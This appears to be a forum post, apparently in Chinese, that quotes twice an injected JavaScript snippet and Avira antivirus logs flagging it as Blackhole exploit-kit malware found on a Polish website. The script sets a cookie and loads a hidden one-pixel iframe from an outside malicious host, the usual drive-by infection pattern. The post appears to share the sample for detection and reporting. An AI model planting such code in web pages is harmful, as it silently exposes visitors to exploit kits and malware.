- function zzzfff() {
 
 -      var bx = document.createElement('iframe');
 
  
-      bx.src = 'http://spendmetest.com/Services/count.php';
 
 -      bx.style.position = 'absolute';
 
 -      bx.style.border = '0';
 
 -      bx.style.height = '1px';
 
 -      bx.style.width = '1px';
 
 -      bx.style.left = '1px';
 
 -      bx.style.top = '1px';
 
  
-      if (!document.getElementById('bx')) {
 
 -          document.write('<div id=\'bx\'></div>');
 
 -          document.getElementById('bx').appendChild(bx);
 
 -      }
 
 -  }
 
  
-  function SetCookie(cookieName, cookieValue, nDays, path) {
 
 -      var today = new Date();
 
 -      var expire = new Date();
 
 -      if (nDays == null || nDays == 0) nDays = 1;
 
 -      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
 
 -      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 
 -  }
 
  
-  function GetCookie(name) {
 
 -      var start = document.cookie.indexOf(name + "=");
 
 -      var len = start + name.length + 1;
 
 -      if ((!start) && (name != document.cookie.substring(0, name.length))) {
 
 -          return null;
 
 -      }
 
 -      if (start == -1) return null;
 
 -      var end = document.cookie.indexOf(";", len);
 
 -      if (end == -1) end = document.cookie.length;
 
 -      return unescape(document.cookie.substring(len, end));
 
 -  }
 
 -  if (navigator.cookieEnabled) {
 
 -      if (GetCookie('visited_uq') == 55) {} else {
 
 -          SetCookie('visited_uq', '55', '1', '/');
 
  
-          zzzfff();
 
 -      }
 
 -  }
 
  复制代码 
- function zzzfff() {
 
 -      var mppba = document.createElement('iframe');
 
  
-      mppba.src = 'http://spendmetest.com/Services/count.php';
 
 -      mppba.style.position = 'absolute';
 
 -      mppba.style.border = '0';
 
 -      mppba.style.height = '1px';
 
 -      mppba.style.width = '1px';
 
 -      mppba.style.left = '1px';
 
 -      mppba.style.top = '1px';
 
  
-      if (!document.getElementById('mppba')) {
 
 -          document.write('<div id=\'mppba\'></div>');
 
 -          document.getElementById('mppba').appendChild(mppba);
 
 -      }
 
 -  }
 
  
-  function SetCookie(cookieName, cookieValue, nDays, path) {
 
 -      var today = new Date();
 
 -      var expire = new Date();
 
 -      if (nDays == null || nDays == 0) nDays = 1;
 
 -      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
 
 -      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 
 -  }
 
  
-  function GetCookie(name) {
 
 -      var start = document.cookie.indexOf(name + "=");
 
 -      var len = start + name.length + 1;
 
 -      if ((!start) && (name != document.cookie.substring(0, name.length))) {
 
 -          return null;
 
 -      }
 
 -      if (start == -1) return null;
 
 -      var end = document.cookie.indexOf(";", len);
 
 -      if (end == -1) end = document.cookie.length;
 
 -      return unescape(document.cookie.substring(len, end));
 
 -  }
 
 -  if (navigator.cookieEnabled) {
 
 -      if (GetCookie('visited_uq') == 55) {} else {
 
 -          SetCookie('visited_uq', '55', '1', '/');
 
  
-          zzzfff();
 
 -      }
 
 -  }
 
  复制代码 
 
Avira 
2013/7/19 上午 06:36 [System Scanner] 發現惡意程式碼 
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\VUGD722P\jwplayer[1].js' 
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus] 
      已採取動作: 
      檔案會移動至 '57ebce6c.qua' 名稱底下的隔離區目錄。. 
 
2013/7/19 上午 06:36 [System Scanner] 掃描 
      掃描結束 [已完成全部的掃描。]。 
      檔案數:        769 
      目錄數:        0 
      惡意程式碼數:        1 
      警告數:        0 
 
2013/7/19 上午 06:34 [System Scanner] 發現惡意程式碼 
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\6IHTB3IO\index[1].htm' 
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus] 
      已採取動作: 
      檔案會移動至 '5499cc2c.qua' 名稱底下的隔離區目錄。. 
 
2013/7/19 上午 06:34 [System Scanner] 掃描 
      掃描結束 [已完成全部的掃描。]。 
      檔案數:        768 
      目錄數:        0 
      惡意程式碼數:        1 
      警告數:        0 
 
2013/7/19 上午 06:34 [Real-Time Protection] 發現惡意程式碼 
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\VUGD722P\jwplayer[1].js 中 
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]' 
      執行的動作:傳輸至掃描程式 
 
2013/7/19 上午 06:34 [Web Protection] 封鎖的網頁 
      URL (http://spendmetest.com/Services/count.php) 的評估結果為 惡意程式碼,而遭到封鎖。 
 
2013/7/19 上午 06:34 [Real-Time Protection] 發現惡意程式碼 
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\VUGD722P\jwplayer[1].js 中 
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]' 
      執行的動作:拒絕存取 
 
2013/7/19 上午 06:34 [Web Protection] 發現惡意程式碼 
      從 URL "http://www.psltv.pl/jwplayer.js" 存取資料時, 
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。 
      已採取動作:已略過 
 
2013/7/19 上午 06:34 [Real-Time Protection] 發現惡意程式碼 
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\6IHTB3IO\index[1].htm 中 
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]' 
      執行的動作:傳輸至掃描程式 
 
2013/7/19 上午 06:34 [Real-Time Protection] 發現惡意程式碼 
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet  
      Files\Low\Content.IE5\6IHTB3IO\index[1].htm 中 
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]' 
      執行的動作:拒絕存取 
 
2013/7/19 上午 06:34 [Web Protection] 發現惡意程式碼 
      從 URL "http://www.psltv.pl/index.php?plik=2029" 存取資料時, 
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。 
      已採取動作:已略過  
 
 
 |